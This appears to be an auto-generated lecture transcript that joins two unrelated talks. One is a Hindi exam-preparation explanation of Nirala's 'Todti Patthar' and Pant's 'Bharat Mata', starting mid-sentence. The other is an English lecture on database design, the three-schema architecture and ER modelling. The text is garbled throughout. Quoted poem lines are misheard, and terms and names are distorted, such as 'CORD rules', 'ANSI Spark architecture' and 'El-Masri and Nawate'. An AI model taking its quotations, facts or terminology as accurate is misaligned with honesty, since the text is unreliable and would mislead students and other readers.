अनुभव कर रहे हैं, इन दो पंक्तियों में हमको मालूम होते हैं। एक क्षण के बाद वह कांपी सुधर, ढुलक माथे से गिर शिकार, लीन हो कर्म में फिर जो कहा मैं तोड़ती पत्थर। एक क्षण के बाद वह काफी सुधर, ढुलक माथे से गिर शिकार, लीन हो कर्म में फिर जो कहा मैं तोड़ती पत्थर। एक बार उन्होंने कवि की ओर देखा है और अपने काम करते करते हुए अपने माथे से शिकार गिर रहे हैं और लीन होते कर्म में फिर एक बार कांप हुई, फिर भी उन्होंने अपने काम में मस्त हो गई और कवि से कह रहे हैं मैं तोड़ती पत्थर। इस प्रकार कवि इस कविता में शोषक वर्गों के प्रति आग्रह व्यक्त करते हैं, शोषक वर्गों के प्रति विरोध भाव व्यक्त करते हैं और शोषित वर्गों के प्रति अपना सहानुभूति व्यक्त करते हैं। इसका भाव है कि सड़क के उस पार बाग बगीचे है और शानदार भवन भी है जिसके निर्माण में वह भागीदार है, लेकिन उसमें सिर्फ उनका प्रवेश भी नहीं है। केवल उन श्रम जीवियों का कष्ट लूटी हो रही है, लेकिन वह असंतुष्ट नहीं है। वे अपने श्रम के बल पर आत्मविश्वास से जीवन निर्वाह करते हैं। श्रम के सौंदर्य का वह साकार रूप है। अभ्यसनार्थ छात्रों के लिए 3 प्रकार के प्रश्न आ जाएगा परीक्षा में। दीर्घ प्रश्न के रूप में तोड़ती पत्थर कविता का सारांश लिखिए, ये दीर्घ प्रश्न के रूप में आएगा। और लघु प्रश्न के रूप में संदर्भ सहित व्याख्या, जो 6 पंक्तियां हैं इनमें से किसी भी एक पंक्ति संदर्भ सहित व्याख्या के रूप में आ जाएगी।
और अति लघु प्रश्न के रूप में तोड़ती पत्थर कविता का उद्देश्य क्या है, सूर्यकांत त्रिपाठी निराला जी का परिचय दीजिए, आदि प्रश्न इसमें आ जाते हैं। सुमित्रानंदन पंत जी का प्रमुख कविता भारत माता। सुमित्रानंदन पंत हिंदी साहित्य के छायावादी युग के 4 प्रमुख स्तंभों में से एक है। जन्म के 6 घंटे के बाद ही उनकी मां का निधन हो गया। उनका पालन पोषण उनकी दादी ने किया। उनका नाम गोसाई दत्त रखा गया। वह गंगादत्त पंत की 8वीं संतान थे। 1910 में शिक्षा प्राप्त करने गवर्नमेंट हाई स्कूल अल्मोड़ा गए। यही उन्होंने अपना नाम बदलकर सुमित्रानंदन पंत रख लिया। मांझले भाई के साथ काशी गए और क्वींस कॉलेज में पढ़ने लगे। वहाँ से हाई स्कूल परीक्षा उत्तीर्ण होकर मेरी कॉलेज में पढ़ने के लिए इलाहाबाद चले गए। 1921 में असहयोग आंदोलन के दौरान उन्होंने महाविद्यालय छोड़ दिया और घर पर ही हिंदी, संस्कृत, बंगाल और अंग्रेजी भाषा साहित्य का अध्ययन करने लगे। साहित्य सृजन इस प्रकार है। महात्मा गांधी के सानिध्य में प्रगतिशील मासिक पत्रिका रूपाभ का संपादन किया। श्री अरविंदाश्रम की यात्रा से आध्यात्मिक चेतना का विकास हुआ। 1940 से 1947 तक आकाशवाणी में परामर्शदाता रहे। 1968 में चिदम्बरा प्रकाशित हुई, जिस पर उन्हें भारतीय ज्ञानपीठ पुरस्कार प्राप्त हुआ। 1960 में काला और बूढ़ा चांद काव्य संग्रह के लिए साहित्य अकादमी पुरस्कार भी मिला है। 1961 में पद्म भूषण उपाधि से भी उन्होंने सुशोभित किया गया। वह जीवन पर्यंत रचनारत रहे। अविवाहित पंत जी के अंतःस्थल में नारी और प्रकृति के प्रति आजीवन सौंदर्यपरक भावना रही। उनकी मृत्यु 1977 में हुआ। आपकी विचारधारा इस प्रकार है। पंत संपूर्ण साहित्य सत्यम, शिवम, सुंदरम के आदर्शों से प्रभावित होते हुए भी समय के साथ निरंतर बदल रहा है। जहाँ प्रारंभिक कविता में प्रकृति और सौंदर्य के रमणीय चित्र मिलते हैं, वहीं दूसरे चरण की कविताओं में छायावाद की सूक्ष्म कल्पनाओं व कोमल भावनाओं और अंतिम चरण की कविताओं में प्रगतिवाद और विचारशीलता देखते हैं। उनकी सबसे बाद की कविताएं अरविंद दर्शन और मानव कल्याण की भावनाओं से ओतप्रोत है। भारत माता कविता में कवि पंत जी ने 3 विषय बताने के लिए उन्होंने कोशिश किया है। भारत का अतीत का वैभव, वर्तमान की दुर्दशा और भविष्य की आशा, इन तीनों हम भारत माता कविता में देखते हैं। याद रखिए, तत्कालीन पंत के समय तत्कालीन भारत की दुर्दशा, पूर्व का वैभव और भविष्य की आशा, इन 3 बिंदुओं के आधार पर भारत माता कविता इर्द गिर्द होती है। देखिए, खेतों में फैला है श्यामल, धूल भरा मैला सा आंचल, गंगा यमुना में आंसू जल, मिट्टी की प्रतिमा उदासीनी, भारत माता ग्रामवासिनी। यहाँ भारत माता की 2 पंक्तियों में भारत माता या भारत का पूर्व वैभव और वर्तमान की दुर्दशा हम यहाँ देखते हैं। भारत माता गाँवों में रहने वाली है, इसलिए धूल भरा मैला सा
आंचल खेतों में फैला हुआ है। गंगा और यमुना में इसके आंसुओं का जल बहता रहता है। इस प्रकार की माँ धरती परतंत्र के कारण सुख दुख आदि के प्रति विरोध भाव से मिट्टी की प्रतिमा जैसा उदास रहा। दैन्य जडित अकल्पनत चितवन अधरों में चिर नीरवरोधन युग युग के तम से विषिन्न मन वह अपने घर में प्रवासिनी भारत माता ग्रामवासिनी। दैन्य जडित अकल्पनत चितवन अधरों में चिर नीरवरोधन युग युग के तम से विषिन्न मन वह अपने घर में प्रवासिनी। वर्तमान समय में भारत की दुर्दशा का वर्णन इस प्रकार उन्होंने कर रहे हैं। तत्कालीन दीनता के कारण अपने होठों में अपार दुख लिए हुए झुकी हुई नेत्रों से कर्म शक्ति के बिना भगवान की ओर आशा से देख रही है। युग युग के अंधकार एवं अज्ञान के कारण वह अपने ही घर में परदेशी बनी हुई है। इस प्रकार भारत माता अकाल में सुख सुविधाओं से वंचित होकर दुखी है। और आगे कह रहे हैं पंत जी ने 30 कोट संतान नग्न तन अर्धक्षुदित शोषित निरस्त्र जन मूढ़ असभ्य अशिक्षित निर्धन नतमस्तक तरुतलवासिनी भारत माता ग्रामवासिनी। 30 कोट संतान नग्न तन अर्धक्षुदित शोषित निरस्त्र जन मूढ़ असभ्य अशिक्षित निर्धन नतमस्तक तरुतलवासिनी भारत माता ग्रामवासिनी। इन पंक्तियों में विदेशी शासन के कारण भारत की दुर्दशा हम देखते हैं। इसका भाव है कि हे भारत माता, अपने संतान निर्धनता के कारण भूखी नीरस असभ्य अशिक्षित साधनहीन और निराश्रित है। सज्जनों में सम्मान न पाने के कारण मस्तक झुकाए रहती है। लेकिन भारत अतीत में धन और धान्य से सर्व समृद्ध है। स्वर्ण श्याम पद पर तल लुंटित धरती सा सहिष्णु मन कुंठित क्रंदन कंपित आधार मौन स्मित राहु ग्रसित शरदेन्दु हासिनी भारत माता ग्रामवासिनी। भारत माता गांवों में ही रहती है। स्वर्ण श्याम पर पदतल लुंटित धरती सा सहिष्णु मन कुंठित क्रंदन कंपित आधार मौन स्मित राहु ग्रसित शरदेन्दु हासिनी भारत माता ग्रामवासिनी। तत्कालीन राजनीतिक विषमता का उन्होंने दुर्दशा का वर्णन इस प्रकार पंत जी ने किया है। शरदकालीन चंद्रमा जैसे निर्मल और हसमुख वाली हे भारत माता, आपकी धन और दौलत का हरण कर रहे हैं विदेशों ने। आपका मन धरती के सामने सहनशील है। परतंत्र में निरंतर अत्याचार के कारण अधरों में मुस्कान दूर होकर सदा दुख से पीड़ित है। यह शरदकालीन चंद्रमा को ग्रहण करने वाली राहु जैसा लग रहा है। हे भारत माता, सफल आज उसका तप संयम पिला अहिंसा स्तन्य सुदोपम हरती जनमन भय भवतन भ्रम जग जननी जीवन विकासिनी भारत माता ग्रामवासिनी। सफल आज उसका तप संयम पिला अहिंसा स्तन्य सुदोपम हरती जनमन भय भवतन भ्रम जग जननी जीवन विकासिनी भारत माता ग्रामवासिनी। अंतिम पंक्तियों में पंत भविष्य की आशा इस प्रकार कर रहे हैं। विदेशी शासन के कारण देशवासी लोह जैसा दृढ़ संकल्प कर
अपने देश की रक्षा करनी चाहिए तथा देश के प्रति श्रद्धा और कर्तव्य के प्रति लगाव होना चाहिए। निरंतर परिश्रम से जीवन को सुधारना चाहिए। देश एवं देशवासियों की सुरक्षा के लिए समर्पित भावना को जरूरत है। इस प्रकार भारत माता कविता में पंत जी ने वर्तमान स्थिति में, पंत के समय में तत्कालीन भारत की दुर्दशा, अतीत का वैभव और भविष्य की आशा व्यक्त कर रहे हैं। अभ्यसनार्थ इन पंक्तियों से किसी एक पंक्ति लघु प्रश्न के रूप में, संदर्भ सहित व्याख्या के रूप में आ जाएगा और भारत माता कविता का सारांश एक दीर्घ प्रश्न के रूप में आ जाएगी। और अति लघु प्रश्न पंत जी का परिचय दीजिए और भारत माता कविता का उद्देश्य क्या है, इस प्रकार के अति लघु प्रश्न परीक्षा में आ जाएगा। धन्यवाद। Today we are going to discuss about a few concepts related to database design, because database design is one of the important parts in maintaining a database management system. So let's quickly look at the agenda that we are going to discuss today. So the first thing is related to database design. Why do we need to do database design? So what is the necessity of doing it? The second thing is, what kind of architecture do we follow in designing a database? And this we will cover in the first session. The second session talks about various steps involved in database design, starting from requirement analysis, conceptual design, logical design, physical design, and security related aspects. And finally, we will conclude this session with an introduction to ER modeling, entity relationship modeling, which covers various kinds of entities, attributes, and the relationships among those entities. So let's get to the first session. So the first session, before we begin the first session, let's have a quick recap of what we need to know to understand the database design. You must have, most of you might have already studied in your semester, in the initial sessions, what is data, what is database, and other things. So data is a collection of known facts, and database is a collection of related data that is interrelated. And database management system is a set of application programs which is used to define, construct, manipulate, share the database. So these are general definitions, because most of these things we use during the next three sessions. The next thing is the data model. So data model is also a very important concept in database design. So it is a collection of concepts that essentially describe the data types, the relationships among data, the constraints that we impose on data, and also the set of operations that we can perform on data. So that those operations can be the basic operations or a certain kind of user defined operations. So these are the things, these are like prerequisites to get to this session. Right. So let's now start the design process. Essentially, any software product, the design of any software product is divided into two parts. It encompasses two different parallels. The first one is the database design. The second one is the application programs design. So application programs design mainly aims at creating interfaces or programs to access the data. So the purpose of application programs is to provide an interface between the user and the data that lies on the database. So these things are addressed as part of software engineering, starting from requirement analysis, different kinds of flow diagrams, sequence diagrams, etc. We do it as part of software engineering.
not the second part, another parallel. In fact, both these things go hand in hand. The second part is the database design. So database design, what do we do here? It's a collection of steps. So what we do in the application programs design, most of these things are similar to your database design. So we discuss about the processes that design, develop, implement and maintain the enterprise data. So basically they talk about the data requirements. So the database design addresses the design of your enterprise data. So why is it needed essentially? Because of course when we have software engineering, we can do application programs, alongside we can define your database also. But why do we need it as a separate step? So the thing that we need to understand is, most of these days we have enterprise applications. When we say enterprise applications, they have a lot of data. It encompasses a wide gamut of data operated by different sets of users. So if you take about a manufacturing company, they have customers, they have products, they have whole lot of supply chain operations, they have customer relationship management. So they come across a lot of data. So we need to maintain the data properly so that we can perform all those operations quickly, effectively, efficiently. So we need to provide the right data, we need to provide the data in the right way. So to perform all these things, we need to have a proper design process in place. So the design is, as described here, design is needed to meet the user's data requirements. Different users have different data requirements, and at the same time we need to provide high performance. So when a user performs an activity, it has to be done in some stipulated time. It should not take too long. For example, you want to query your personal details, or you want to find the details of a customer. So if it is taking too long, obviously the application performance goes down, and it leads to customer dissatisfaction. So we need high performance. At the same time, we need data consistency also. You should not maintain data related to one particular object or one particular thing redundantly. Any kind of redundancy leads to data inconsistency. So because you may update the data at one place, if you do not update it at another place, obviously you'll have two different copies of the same data, which leads to a kind of ambiguity and obviously results in inconsistency. The fourth thing is reducing disk space, because as I said, we have a whole lot of data related to different users, different entities, different kinds of operations. So obviously when you store such data, it consumes a lot of storage space. So to reduce storage space, you need to properly design it so that you maintain only the essential data, and you maintain the data without any kind of redundancies. And last but not the least is the enabling easier maintenance. Obviously, if you maintain data properly, maintenance would be pretty easy. If you maintain too many copies and in different data storage devices, obviously it leads to difficult maintenance. So if you properly design it, maintenance would be pretty easier. In fact, in database management, design is the heart and soul of your database management. So this is the essential thing in database implementation. So before we get to the database design activities and other related things, let's have a quick understanding of schema, because this is what we are going to use in the session, in the architecture also. Schema is the description of the database. Basically, a schema is called the description of the database. What do you mean by the description of the database? It talks about the record structure. So how do you want to maintain? For example, you have a student record. So what kind of data items it consists of, and what are the constraints on those data items? Because there may be, if you take an employee record, there may be certain constraints on the employee record. The salary should not exceed so and so amount, the salary should not fall below certain amount. So these are all data related constraints. So your schema specifies all those things, like the data types, the record structure, the constraints on the data, and also the possible operations that you can perform on the data. Actual data is stored in the schema of the database, but schema specifies what kind of data that you can store. So in a sense, actual data changes frequently because you keep updating records, you keep adding records, you keep deleting records, but the schema does not change so frequently. It's not that it does not change at all, it changes, but less frequently, so less frequently as compared to your data. So schema is succinctly specified, it's briefly specified using a schema diagram. Schema diagram does not contain all the details, but it gives the high level picture of your database so that you can
quickly understand what kind of data it stores, what are the relationships, what are the constraints, etc. So, because based on this schema itself, we will architect our database, because architecture is the prerequisite thing. As we know in the software engineering, architecture is the first thing before we design, because we need to follow certain design guidelines, certain architectural principles to design the database. So, in case of DBMS, there is an American National Standard Institute Spark architecture. It is the 3 schema architecture. So, we have 3 levels of schemas here. So, why do we go for the database approach? So, database, in fact, to maintain data we have file systems, etc. But why do we go with the database approach? Based on CORD rules, we can briefly summarize them as: we need a catalog to store the database description so that we can change it as and when we need it, and the data independence. So, we will discuss in the next slide what data independence is. And data abstraction. Data abstraction is hiding the implementation details, because as an end user you really do not want to see how the data gets stored, how the data gets retrieved from your storage device. All you need to know is how to perform your operations. And support for multiple user views, because different users want to see different portions of data in different ways. So, obviously you need to enable that. So, based on these objectives, ANSI, the American National Standard Institute, has come up with a 3 schema architecture. So, to achieve these objectives, they have come up with the 3 schema architecture. What are those schemas? One is the internal schema, conceptual schema, and external schema. Internal schema is the actual physical storage structure. So, it talks about how the data gets stored on your storage device. So, the second thing is the conceptual schema. Conceptually, it specifies what kind of data you are storing, what are the data types, what are the constraints, operations you can perform on the data. So, it specifies in a conceptual way. So, we will see what conceptual design is in the subsequent sessions. And finally, the external schema. So, what kind of data you want to see. So, it only gives a presentation of the portion of the database. So, what kind of data you want to see, from which data items, and which data items you want to see. So, all those things are specified in the external schema. So, this is how it looks like, the 3 schema architecture. So, you have the stored database, on top of it the internal schema, which describes the actions that the way data gets stored on your storage device. Secondly, you have, at the second level, you have the conceptual schema. In between these two, you have the mapping. So, from the internal schema to conceptual schema, you need a mapping. And at a higher level, you have the external view, external schema, because that's what end users see. They do not really want to know what is happening underlying the database. So, for this, you need to again have an external to conceptual to external data mappings. So, as part of the previous slide, we talked about the data independence, because this is one of the important objects of your database design. So, what do we have here? So, you have 2 kinds of data independence: physical data independence and logical data independence. So, what do you mean by physical data independence? It is the ability to change the internal schema. So, you may change the way the data gets stored. It can be on any kind of hardware. You may change it, but it should not impact your conceptual schema. So, it is the ability to change the internal schema without having to make any changes on the conceptual schema. The second one is the logical data independence. It is the ability to change the conceptual schema without having to worry about the external schema. So, you want to change the second level, but it should not impact the external schema. So, database design is done with the main aim of enabling physical or logical independence. Of course, both these things, your physical data independence may be easier to achieve as compared to logical data independence, but still most of the database designs try to focus on achieving these things. So, now that we have understood the architecture, the 3 schema architecture, let us get to the database design. So, how do we map the architecture to the design? So, the 3 schema architecture and the three levels of data mappings and models. We have 3 levels of data models and 3 levels of mappings. So, these things enable us, or these things provide us with the basis for database design. So, database design essentially focuses on producing a conceptual design, logical design, and physical design. So, now that we have understood the prerequisites for database design, let us now get to the next topic. So, how do we
what are the steps involved in database design, the sequence of steps, and what do we perform there, and how do we perform these activities. And as you look at the references, for more details you can go to the 6th edition of El-Masri and Nawate, Fundamentals of Database, and you can also browse the online for more information on this session. Now that we have understood the first session, let us get to the next session, which is the sequence of steps that we need to perform in the database design. In the previous session, we understood the 3 schema architecture, the foundation of database design. Now let us look at the database design steps. So what do we perform? What are the activities that we perform in the database design? So let us get to the same slide which we have seen in the first presentation. So the overview of application, any software product design. So you have 2 different parallels. One is the database design and the application programs design. So this is depicted in this diagram. So you have any product, any service or any product design starts with requirement collection and analysis. So this is the basic software engineering technique. So that's what we do even in case of database design. So we understand the user's requirements, end user's requirements, functional requirements, non-functional requirements, all those things in detail through different methods that we use, the facilitated application specification approach, or quality function description approach, what we study in software engineering, or questionnaires, interviews, brainstorming. So you perform a whole lot of activities to collect the end user requirements, and you perform an analysis on those requirements. From there you divide into 2 different parts. One is the functional requirements. So functional requirements in the sense, what kind of, why are we building this software product? So what are its essential functionalities? The second thing is data requirements. So what kind of data flows? So your data flow diagrams may help in finding the database data requirements. The functional requirements anyways are addressed to your state diagrams, sequence diagrams, process flow diagrams, etc. So data, 2 different parallels. The second thing is, the second level, you perform the functional analysis for your functional requirements. So to understand, basically the purpose of functional analysis is to understand what kind of processes you need to design. As part of your data design, so you may perform a conceptual design. So this is database management system independent activities. These are database DBMS independent activities. So you can perform these activities even though you do not have any commercial DBMS available for the implementation of your project. At the third level, you have the application programs design for functional requirements. So what kind of programs you design, what kind of user interface you need to design. So all those things you specify in the application program design. Coming to the data requirements, you have the logical design. So this is where you implement your conceptual design using a commercial DBMS. That's why it's a DBMS specific approach. So it actually lies in between the DBMS independent activities and DBMS specific activities. And finally, you specify the physical design. So how the data gets stored on your storage device. And as part of your functional requirements, you specify how transactions are implemented, because transaction control is another session altogether. So let's not get too much detail into it. So transaction implementation, and also it talks about the application security and data security. So these are the essential steps juxtaposed. So application design vis-a-vis database design. So now, since we are talking about the database design, let's quickly look at the database development life cycle. So basically you have the requirement analysis. So you plan for your requirement analysis, you gather the requirements, you analyze those requirements, and you specify a high level database definition. So what kind of database that we are going to build. So in the previous sessions you might have studied that database is a mini world. It's also known as universe of discourse, because it talks about only the specific part of the entire. For example, you take university is like a mini world which consists of a lot of objects, entities, etc.
So that's what you specify in your database definition. The second step is the database design. So database design again is divided into 3 high level steps: conceptual, logical, and physical. And finally, the database implementation, because once you have your database in place, you need to load the data, because database design only addresses how the data gets stored, what are its properties, what are the constraints that you can specify, but it does not store the actual data. So your implementation will address it. So what do you do as part of implementation? You convert the data. If you have an existing system in a file based management system, or in some other mainframe system, or in some other store, data store, so you need to take the data, you need to convert it, you need to cleanse the data, you need to convert it, and again you need to load it, and finally you need to test it. There are different levels of testing. You need to do performance testing, you need to do some functional testing to ensure that your database is properly designed and implemented. So these are the high level steps that we do as part of your database design development life cycle. Most of these steps are in line with your software development life cycle. There may be some changes with respect to your database implementation, but most of these things go hand in hand. So these are the high level steps that we perform in the database design. The first thing is requirement analysis, as discussed. The second thing is conceptual design, and then we do a logical database design, schema refinement, physical DB design, and application and security design. So let's look at all these steps with some kind of details. So the first thing is requirement analysis. It aims at understanding and documenting the data requirements. So the main purpose of this particular step is to understand and document the data requirements. So it does not talk about the functional requirements. It talks about what kind of data is coming in, what kind of data is coming out, going out, what are the requirements. So how do end users want to see the data? Are there any constraints on the data? So what kind of operations they want to perform? So it elucidates the key operations, the key transactions that need to be performed on data. The main focus is on data, not on the functionality. So it also, as I said, the main focus is on specifying how the data gets updated, what kind of data gets retrieved, how much performance is needed, what is the volume of the data. Volumetrics is also another important thing, because if you do not consider it and you go with your database design, you may end up with a failure, because higher the volume, the lower the performance it becomes. So obviously you need to focus on the volumetrics of your data as well. The second step is the conceptual database design. So this approach focuses on transforming your requirements. So the first step is done. You have all the data requirements ready, all the operations to be performed. So you have identified what kind of data comes in, what kind of data goes out. So what kind of operations you need to perform, what are the constraints. So the next thing is to map it to a conceptual design. So you need to specify all those requirements in a conceptual way. You need to design them in a conceptual way. So it is the description of the data that includes constraints and your operations. So the important thing that you need to understand here is it does not include any kind of implementation details. It does not talk about how the data gets how the database gets implemented. So it does not talk about it. It only talks about the high level description. So it provides a kind of data abstraction. So it does not focus on how the data will be stored, where it will be stored physically. It only concentrates on specifying the properties of data, their interrelations, and any kind of possible constraints that you can specify. So to do this, you need to use a high level data model such as entity relationship model, which we are going to discuss in the next session, that is session 3. So it uses a high level data model to describe your database conceptually. So the next step in the database design is the logical database design. So this is where the actual implementation starts. This is the DBMS specific component. So this one is DBMS independent. You really do not know what kind of DBMS you are using. You can use an Oracle DBMS, you can use a Microsoft SQL server, or you can use MySQL, you can use PostgreSQL. It doesn't really matter at this stage. What matters is to understand your data requirements and design them properly, conceptually. What are the properties of your data? What are the constraints? What are the operations that you can perform? So at a high level, you specify this thing. So this is DBMS independent activity. Whereas this one is a DBMS dependent activity, because this is the step
where you transform your conceptual design into a logical design. It's nothing but performing the actual implementation of the database. So it enables the data to be stored independent of physical considerations. Again, this step also, though it implements your database using a commercial DBMS, it neither talks about the actual physical requirements. So how the data gets stored. So whether it gets stored in bytes, bits, so how does it actually interact with your hardware. So it does not talk about it. It only talks about the implementation. So it essentially transforms the conceptual design into the implementation design. Once you have your implementation ready, the next thing is the schema refinement, because now that you, as we discussed in the previous session, schema is the description of the data. So what is the record structure, what are the data types, what are the relationships, operations, constraints, etc. So now that you have your logical database design ready with all the schemas defined, the next step is to refine it, because the initial design may not give you the complete picture without any kind of inconsistencies. So obviously you need to look at if there are any redundancies. Are we storing the data in multiple places, or are we storing the data in a way that leads to redundancy? Are we storing the data in a way that leads to any kind of inconsistency? So those things have to be analyzed, and we need to focus on removing those redundancies. So it basically, if you have data stored in multiple times, it leads to a kind of data anomaly. So you will discuss all those things in the subsequent sessions as part of your course. But the main purpose of schema refinement is to remove all such anomalies. We have insert anomalies, update anomalies, delete anomalies. So obviously you should not get into those kinds of anomalies, because the moment you have any kind of data inconsistency, it may lead to the complete failure of your application as well. So it should be done so carefully. Again, so there may be cases where you have to store your data in multiple places. So in those cases you need to consider the situation. So you need to consider those things into account, and then accordingly you need to design your database. Schema refinement is again an important step to follow, because you need to make sure that you are not compromising on your database performance. You may store it at only one place, but that may reduce your database performance. So you need to consider those things also into account, and accordingly you need to perform your schema refinement. This is generally done using normalization. You have different kinds of normal forms. So that anyways we will discuss in the subsequent parts of this particular course. So you have different kinds of normal forms available. So this is what we do, and sometimes we may have to do this using denormalization also. So this is the next step. Then this is the next step in your database design, the physical database design. So physical database design is the translation of your logical design, because now that you have implemented your database, so you need to make sure that you specify all the essentials that talk about how the data gets stored on your physical media, on your storage devices. So it focuses on specifying internal storage structures, so how the database files are stored on your storage device, and how the files are organized, database files, and what kind of indexes you need to create, because indexes are part of your performance management. So, and how the data gets accessed, so access paths. For example, you are querying the employee details. So how does it get accessed from your database? So what is the path that it has to follow? So you have different kinds of optimization techniques that we discuss in performance management, cost-based optimizers and rule-based optimizers. So all those things, and what are the physical design parameters? How much heap space has to be there? How much cache has to be allocated? So all those things have to be specified in your database files, so as not to tamper with your database performance. So this is physical database design is mostly done by your database administrator. As a developer or a designer, you don't consider these things into account. Your main focus is on coming up with conceptual design, logical design, and schema refinement. Physical database design is generally done by a database administrator, because they interact more with the hardware, so they consider all those aspects into account. So the initialization parameters, the database initialization parameters,
where are the files stored and how are those files organized. So all those things are specified. And how frequently should we archive the data, how frequently should we take backups of the data. So all those things are addressed in your physical database design. So it also analyzes the database workload. If there are too many users accessing and too many activities are going on, so they need to refine this physical design. So physical design is again is not a one-time activity, it keeps performed. So database administrators regularly check the database workload. So automatic workload repository reports. So they generate those reports. Based on those reports, they will refine the physical database design. So they increase the number of operating system processes or reduce the operating system processes, or they allocate more memory to them. So all those things are performed. So basically the main purpose of this activity is to meet the performance criteria, because while during the function requirement analysis you specify both functional and non-functional requirements. Performance being a non-functional requirement is addressed here. So and they also look at the scalability, portability. So all those non-functional requirements are addressed in your physical database design. So the last step, but the most important step, one of the most important activities in today's application design is the application and database security. Because most of these today, if you look at the data, most of the data is sensitive, personally identifiable information. So if anybody gets access to it, so they can do anything, something like your credit card numbers, debit card numbers, PIN numbers, all those things. So your payment details, or it may be related to your personal life also. So this particular step establishes the principles on how to deal with your sensitive data, personally identifiable information. So it defines the encryption and decryption mechanism, because you don't store the data in plain text. Certain data should not be stored in plain text. Your debit card number or a credit card number should not be stored in plain text. So you need to encrypt it. So when you store it, you need to use certain encryption mechanism to store it, so that when you query the data, when you want to see the data, you don't see the plain text, you see the encrypted data. But when you access it, when you are trying to perform a payment, make a payment, so the encrypted data has to be decrypted. So the encryption and decryption mechanism is specified. It also specifies authentication and authorization principles. So what kind of users have access to data? Can anybody access this database? Obviously not, because there are certain people, based on their role and designation, they can access only specific part of the data. So you need to specify authentication. So they need to authenticate themselves. They need to give their security credentials to get access to their database. And authorization. So am I able to access this particular data? For example, payment data. Only finance department should get access to it. Not all the other departments should not get access. Like employee data. Employee data should be accessible only to HRMS team, a human resources team. Others should not be able to see the data. So how do you specify those authorization principles? So you need to specify the user roles and access control lists. So basically this talks about the definition of your security realm, which consists of authentication, authorization, all those security related aspects. It's an inevitable part in software application design these days. So you cannot do away with it. So you have to take into account the application and database security. So now the first step, assuming that we are done with the requirement analysis, the very first step is to coming up with your conceptual design, because that's what, if you look at the sequence of steps here, we have requirement analysis. Now that we have the requirements ready, all the data requirements are in place, the next step is to coming up with the conceptual design. So how do you design your database conceptually? So what are the activities involved in it? So this includes various data. So you need to understand what are various data items, how can they be grouped, so how are they interrelated, so what are the operations that you need to perform, how to identify individual data elements. So this step focuses on addressing all those things and coming up with a conceptual schema. As I said, schema is a description of your database. So this particular thing addresses the conceptual level schema. It's a high level schema. It's a high level description of your database. It does not talk about how the data gets internally stored or how the database gets implemented, because they are part of your logical database design and physical database design. So the next session focuses on specifying various concepts involved in conceptual design. And conceptual design
is done through various modeling techniques, and one of the popular techniques is the entity relationship modeling. Of course, we have object modeling techniques also using unified modeling language, UML modeling, but today's session focuses on ER modeling, entity relationship modeling. So again, these are the references that you may have to look for more details. So it is chapter 7 in Fundamentals of Database Systems by Elmasri and Nawate, 6th edition. And you can browse through your online resources also for more details onto it. So now let's get to the next session where we talk about entity relationship modeling and conceptual design using entity relationship modeling. So in the second session, we discussed about the steps that we need to perform in the database design, requirement analysis, conceptual design, logical design, physical design, etc. So as part of that, the very post requirement analysis, we start with the conceptual design. So this session talks about the conceptual design and some important aspects of conceptual design using entity relationship modeling. It gives a brief introduction to entity relationship modeling. So basically, what does it do? The conceptual design. Conceptual design focuses on identifying various data entities, their properties, relationships, and possibly certain constraints. So this is done using entity relationship modeling. So this entity relationship model focuses on unleashing the interrelated things in a specific domain of knowledge. As said, database talks about a mini world, like a university, like a student database, or a manufacturing company, or a customer relationship management company. So obviously it's a universe of discourse which talks about only the data related to that particular domain. So this entity relationship model identifies the various elements involved in it and their interrelationships and properties. It is proposed by Peter Chen in 1976. It is popularly expressed using diagrammatic notation, that is called ER diagrams notation. So that also we will discuss in this session. So before we get to the understanding of entity relationship model, let's take an example domain, because an example will make things clear. We can easily map a database the design of database to a conceptual design. So we have a company database which is organized into departments, and each department has certain properties like name, number, etc., and an employee who manages it. And each department may have several locations. And the second thing is, department controls the number of projects, because a department can have multiple projects. Each project has its own properties. And then company consists of several employees. Each employee has certain data elements like social security number, etc., address, salary, etc. And each employee works for one department, and he can work on multiple projects. Each employee may have one or more dependents or zero or more dependents, and dependents have these kinds of attributes. The attributes name, gender, birth date, relationship to the employee. So the reason why we have taken this domain is to understand this model, because this is the requirement we have. After requirement analysis, let's say this is what is given to us. So how do we map it to conceptual design? Just to understand it, we've taken this example. So before we go to the conceptual design for the domain that we have taken, let us look at some of the definitions here. So the first one is an entity. Every data item is called an entity, every component or an object. So an entity is a specific object or thing in the many world. As I said, the domain that we are creating, the company domain, is a many world. In that, every entity is a specific object or a thing. For instance,
an employee John Smith. John Smith is an employee in the company for which we are designing the database. So he is an entity. And research department research is an entity. Project, product X, for example, somebody is working on product X, so that's a project, so that's an entity. So every noun form can be broadly categorized into an entity. So an entity represents a physical thing. It may have a physical existence or conceptual existence. Physical existence in the sense an employee physically exists, so you can see that. And customer account number, for example, a bank account number, it's a conceptual thing. You cannot touch it. Basically, it's an intangible thing. It's a conceptual existing thing. So the next thing is attributes. What are the attributes? Attributes are the properties to describe an entity. So entity just gives the name of that particular thing. For example, John Smith is an employee, so that's an entity. What does that entity consist of? So what are its properties? So those properties are attributes. For instance, employee John Smith may have certain properties like name. He has a name called John Smith. He has a social security number. If you're talking about the Indian perspective, so he may have a unique identification number, Aadhaar number, address. He may have gender, as male, female, date of birth. So all those things are the attributes of that particular entity. So a specific employee may have these kinds of, for example, as you can see, John Smith is the name of that particular employee, SSN is so and so, his address, his gender, birth date. So each attribute has a data type associated with it. That's another important thing, because conceptually when we are specifying the conceptual thing, you need to understand what kind of data you are storing. So each attribute has a data type. For example, your name is a character kind of data. Your date of birth is date kind of data. Your social security number is a number, numerical data. Your age is numerical data. Your address is alphanumeric data. So obviously you need to understand. Likewise, your gender, it can be either male, female or transgender. So you have an enumeration. You have only 3 possible values. So each attribute has a data type associated with it. So now that we have understood the entity represents a physical thing, an existing thing. It's a real world thing. So all such entities, related entities, are grouped into an entity type. For example, you have several employees. One such employee is John Smith. Another employee is Joe Burns. Another employee is Stephen Smith, something like that. So you have 3 or 4 employees or hundreds of employees. So these are all individual entities. So you combine them, you group them into an entity type. So in this case, you may combine all your employees into an entity type called employee. So it's an entity type. So it represents an entity type. It is not the physical thing, it is the conceptual thing. Likewise, you may have several projects going on in your company. So all those projects are grouped into an entity type called project. So you have several project entities. All those entities are grouped into entity type. So entity type is the conceptual thing, whereas your entities are the actual data, physically existing things. So each entity type will have a collection of entities stored in the database as discussed. So employee entity type has several employee entities. Project entity type has several project entities. Your department entity type has several department entities. So your entity type does not change. The entity type along with its attributes does not change, but the entities keep changing. So because you update, for instance, you may have a new employee joining, so you add those details. For example, the details of an existing employee is changed, his salary is changed, or he has retired, so you update the date of retirement, or he has got promotion, so he is promoted to the next level, so his designation changes. So all those things keep 